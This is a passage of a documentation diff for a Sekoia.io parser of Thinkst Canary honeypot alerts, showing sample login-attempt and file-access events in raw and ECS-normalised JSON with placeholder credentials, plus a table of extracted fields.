\"GET\", \"CHANNEL\": \"TLS\", \"PATH\": \"/path/to/a/secret/\", \"USERAGENT\": \"curl/8.7.1\", \"RESPONSE\": 200, \"USERNAME\": \"jdoe\", \"PASSWORD\": \"mysecuredpassword\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"3001\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "3001", + "reason": "HTTP Login Attempt", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 22 + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 200 + } + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "jdoe" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "tls": { + "established": true + }, + "url": { + "path": "/path/to/a/secret/" + }, + "user": { + "name": "jdoe" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "curl", + "original": "curl/8.7.1", + "os": { + "name": "Other" + }, + "version": "8.7.1" + } + } + + ``` + + +=== "test_http_page_load.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"HTTP Page Load\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"METHOD\": \"GET\", \"CHANNEL\": \"TLS\", \"PATH\": \"/path/to/a/secret/\", \"USERAGENT\": \"curl/8.7.1\", \"RESPONSE\": 200, \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"3000\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "3000", + "reason": "HTTP Page Load", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 22 + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 200 + } + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "tls": { + "established": true + }, + "url": { + "path": "/path/to/a/secret/" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "curl", + "original": "curl/8.7.1", + "os": { + "name": "Other" + }, + "version": "8.7.1" + } + } + + ``` + + +=== "test_http_proxy_request.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"HTTP Proxy Request\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"URL\": \"https://example.org/path/to/a/secret/\", \"USERAGENT\": \"curl/8.7.1\", \"USERNAME\": \"jdoe\", \"PASSWORD\": \"mysecuredpassword\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"3001\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "3001", + "reason": "HTTP Proxy Request", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 22 + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "jdoe" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "url": { + "domain": "example.org", + "original": "https://example.org/path/to/a/secret/", + "path": "/path/to/a/secret/", + "port": 443, + "registered_domain": "example.org", + "scheme": "https", + "top_level_domain": "org" + }, + "user": { + "name": "jdoe" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "curl", + "original": "curl/8.7.1", + "os": { + "name": "Other" + }, + "version": "8.7.1" + } + } + + ``` + + +=== "test_incident.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"incident\", \"summary\": \"Canarytoken triggered\", \"timestamp\": \"1720684212\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Canarytoken triggered", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:50:12Z", + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + } + } + + ``` + + +=== "test_ldap_bind_attempt.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"LDAP Bind Attempt\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"DN\": \"uid=john.doe,ou=People,dc=example,dc=com\", \"MECH\": \"GSSAPI\", \"VER\": \"1.0.2\", \"REQ\": \"request\", \"TYPE\": \"PASSWORD\", \"PASSWORD\": \"mysecuredpassword\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"31001\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "31001", + "reason": "LDAP Bind Attempt", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 22 + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "user": { + "domain": "example.com" + } + } + + ``` + + +=== "test_mongo_request.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"Mongo Authentication Attempt\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"cmd\": \"insert\", \"db\": \"mydatabase\", \"user\": \"myuser\", \"password\": \"mysecuredpassword\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"28002\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "action": "insert", + "category": [ + "intrusion_detection" + ], + "code": "28002", + "reason": "Mongo Authentication Attempt", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 22 + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "myuser" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "db": "mydatabase", + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "user": { + "name": "myuser" + } + } + + ``` + + +=== "test_mssql_login_attempt.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"MSSQL Login Attempt\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"HOSTNAME\": \"mssql.example.com\", \"APPNAME\": \"sqlcmd\", \"USERNAME\": \"myuser\", \"PASSWORD\": \"mysecuredpassword\", \"SERVERNAME\": \"1.2.3.4\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"9001\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "9001", + "reason": "MSSQL Login Attempt", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "mssql.example.com", + "domain": "mssql.example.com", + "ip": "5.6.7.8", + "port": 22, + "registered_domain": "example.com", + "subdomain": "mssql", + "top_level_domain": "com" + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "process": { + "name": "sqlcmd" + }, + "related": { + "hosts": [ + "mssql.example.com", + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "myuser" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "user": { + "name": "myuser" + } + } + + ``` + + +=== "test_mysql_login_attempt.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"MYSQL Login Attempt\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"CLIENT_HASH\": \"adc83b19e793491b1c6ea0fd8b46cd9f32e592fc\", \"SALT\": \"18cebe27dc51ad8114db58ef50cf2915c66a1f94\", \"USERNAME\": \"myuser\", \"PASSWORD\": \"mysecuredpassword\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"8001\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "8001", + "reason": "MYSQL Login Attempt", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 22 + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "myuser" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "user": { + "name": "myuser" + } + } + + ``` + + +=== "test_shared_file_opened.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"Shared File Opened\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"USER\": \"jdoe\", \"FILENAME\": \"myimportantfile\", \"AUDITACTION\": \"pread\", \"DOMAIN\": \"EXAMPLE\", \"LOCALNAME\": \"hostname\", \"MODE\": \"domain\", \"OFFSET\": 0, \"REMOTENAME\": \"CANARY\", \"SHARENAME\": \"ImportantStuff\", \"SIZE\": 1800, \"STATUS\": \"OK\", \"SMBARCH\": \"11\", \"SMBVER\": \"1.0.0\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"5000\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "action": "pread", + "category": [ + "intrusion_detection" + ], + "code": "5000", + "reason": "Shared File Opened", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "action": { + "properties": { + "Domain": "EXAMPLE", + "ShareName": "ImportantStuff", + "UserName": "jdoe" + } + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8" + }, + "file": { + "name": "myimportantfile", + "size": 1800 + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "jdoe" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "smbarch": "11", + "smbver": "1.0.0" + }, + "user": { + "name": "jdoe" + } + } + + ``` + + +=== "test_ssh_login_attempt.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"SSH Login Attempt\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"LOCALVERSION\": \"SSH-2.0-MS_1.100\", \"PASSWORD\": \"mypasswordverysecured\", \"REMOTEVERSION\": \"SSH-2.0-libssh2_1.10.1_DEV\", \"USERNAME\": \"jdoe\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"4002\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "4002", + "reason": "SSH Login Attempt", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 22 + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "jdoe" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "user": { + "name": "jdoe" + } + } + + ``` + + +=== "test_tftp_request.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"TFTP Request\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"FILENAME\": \"accounting2024.pdf\", \"OPCODE\": \"READ\", \"MODE\": \"netascii\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"10001\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "10001", + "reason": "TFTP Request", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8" + }, + "file": { + "name": "accounting2024.pdf" + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + } + } + + ``` + + +=== "test_winrm_login_attempt.json" + + ```json + + { + "message": "{\"incident_id\": \"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212\", \"event_type\": \"event\", \"acknowledged\": \"False\", \"created\": \"1720684078\", \"created_std\": \"2024-07-11 07:47:58 UTC+0000\", \"description\": \"SSH Login Attempt\", \"dst_host\": \"5.6.7.8\", \"dst_host_public_ip\": \"\", \"dst_port\": \"22\", \"WORKSTATION\": \"desktop001\", \"PASSWORD\": \"mypasswordverysecured\", \"DOMAINNAME\": \"EXAMPLE\", \"AUTHTYPE\": \"digest\", \"USERNAME\": \"jdoe\", \"timestamp\": 1720684081, \"timestamp_std\": \"2024-07-11 07:48:01 UTC+0000\", \"flock_id\": \"flock:default\", \"flock_name\": \"Default Flock\", \"ip_address\": \"\", \"ippers\": \"\", \"local_time\": \"2024-07-11 07:47:51\", \"logtype\": \"4002\", \"mac_address\": \"\", \"matched_annotations\": {}, \"name\": \"thinkst-canary\", \"node_id\": \"xxxxxxxxxxxxxxxxxxxx\", \"notified\": \"False\", \"src_host\": \"1.2.3.4\", \"src_host_reverse\": \"vm000000.example.org\", \"src_port\": \"53804\"}", + "event": { + "category": [ + "intrusion_detection" + ], + "code": "4002", + "reason": "SSH Login Attempt", + "start": "2024-07-11T07:47:58Z", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-07-11T07:48:01Z", + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 22 + }, + "observer": { + "product": "Thinkst Canary", + "vendor": "Thinkst Canary" + }, + "related": { + "hosts": [ + "vm000000.example.org" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "jdoe" + ] + }, + "source": { + "address": "vm000000.example.org", + "domain": "vm000000.example.org", + "ip": "1.2.3.4", + "port": 53804, + "registered_domain": "example.org", + "subdomain": "vm000000", + "top_level_domain": "org" + }, + "thinkst_canary": { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212" + }, + "user": { + "name": "jdoe" + } + } + + ``` + + + + + +### Extracted Fields + +The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. + +| Name | Type | Description | +| ---- | ---- | ---------------------------| +|`@timestamp` | `date` | Date/time when the event originated. | +|`action.properties.Domain` | `keyword` | | +|`action.properties.ShareName` | `keyword` | | +|`action.properties.UserName` | `keyword` | | +|`destination.domain` | `keyword` | The domain name of the destination. | +|`destination.ip` | `ip` | IP address of the destination. | +|`destination.nat.ip` | `ip` | Destination NAT ip | +|`destination.port` | `long` | Port of the destination. | +|`event.action` | `keyword` | The action captured by the event. | +|`event.category` | `keyword` | Event category. The second categorization field in the hierarchy. | +|`event.code` | `keyword` | Identification code for this event. | +|`event.dataset` | `keyword` | Name of the dataset. | +|`event.kind` | `keyword` | The kind of the event. The highest categorization field in the hierarchy. | +|`event.reason` | `keyword` | Reason why this event happened, according to the source | +|`event.start` | `date` | event.start contains the date when the event started or when the activity was first observed. | +|`event.type` | `keyword` | Event type. The third categorization field in the hierarchy. | +|`file.name` | `keyword` | Name of the file including the extension, without the directory. | +|`file.size` | `long` | File size in bytes. | +|`http.request.method` | `keyword` | HTTP request method. | +|`http.response.status_code` | `long` | HTTP response status code. | +|`observer.product` | `keyword` | The product name of the observer. | +|`observer.vendor` | `keyword` | Vendor name of the observer. | +|`process.name` | `keyword` | Process name. | +|`source.domain` | `keyword` | The domain name of the source. | +|`source.geo.city_name` | `keyword` | City name. | +|`source.geo.continent_code` | `keyword` | Continent code. | +|`source.geo.country_iso_code` | `keyword` | Country ISO code. | +|`source.geo.timezone` | `keyword` | Time zone. | +|`source.ip` | `ip` | IP address of the source. | +|`source.port` | `long` | Port of the source. | +|`thinkst_canary.canary_token` | `keyword` | | +|`thinkst_canary.db` | `keyword` | | +|`thinkst_canary.incident_id` | `keyword` | | +|`thinkst_canary.ports` | `keyword` | | +|`thinkst_canary.repo` | `keyword` | | +|`thinkst_canary.smbarch` | `keyword` | | +|`thinkst_canary.smbver` | `keyword` | | +|`tls.established` | `boolean` | Boolean flag indicating if the TLS negotiation was successful and transitioned to an encrypted tunnel. | +|`url.original` | `wildcard` | Unmodified original url as seen in the event source. | +|`url.path` | `wildcard` | Path of the request, such as "/search". | +|`user.domain` | `keyword` | Name of the directory the user is a member of. | +|`user.name` | `keyword` | Short name or login of the user. | +|`user_agent.original` | `keyword` | Unparsed user_agent string. | + + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/ThinkstCanary/thinkst-canary). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/89346697-b64b-45d4-a456-72fd8a2be5d8_sample.md b/_shared_content/operations_center/integrations/generated/89346697-b64b-45d4-a456-72fd8a2be5d8_sample.md new file mode 100644 index 0000000000..3288f3cb0d --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/89346697-b64b-45d4-a456-72fd8a2be5d8_sample.md @@ -0,0 +1,795 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "test_consolidated_network_port_scan" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "Consolidated Network Port Scan", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "23": [ + "5.6.7.8" + ], + "80": [ + "5.6.7.8" + ], + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "5007", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_dns_canary_token" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1721315330", + "created_std": "2024-07-18 15:08:50 UTC+0000", + "description": "Canarytoken triggered", + "dst_host": "5.6.7.8", + "dst_port": 53, + "canarytoken": "1111111111111111111111111", + "geoip": { + "city": "Paris", + "continent_code": "EU", + "country": "France", + "country_code": "FR", + "country_code3": "FRA", + "currency_code": "EUR", + "host_domain": "", + "hostname": "", + "ip": "1.2.3.4", + "is_bogon": false, + "is_v4_mapped": false, + "is_v6": false, + "latitude": 48.859077, + "longitude": 2.293486, + "region": "Ile-de-France", + "region_code": "J", + "timezone": { + "abbr": "CEST", + "date": "2024-07-18", + "id": "Europe/Paris", + "name": "Central European Summer Time", + "offset": "+02:00", + "time": "17:08:54.722399" + }, + "valid": true + }, + "hostname": "1111111111111111111111111.example.org", + "ip_blocklist": { + "is_proxy": false, + "is_tor": false, + "is_vpn": false + }, + "src_host": "1.2.3.4", + "timestamp": 1721315332, + "timestamp_std": "2024-07-18 15:08:52 UTC+0000", + "type": "dns", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "local_time": "2024-07-18 15:08:50 (UTC)", + "logtype": "16000", + "matched_annotations": {}, + "memo": "Integration dns", + "name": "N/A", + "node_id": "1111111111111111111111111", + "notified": "False", + "src_port": "40296" + } + ``` + + + +=== "test_ftp_login_attempt" + + + ```json + { + "incident_id": 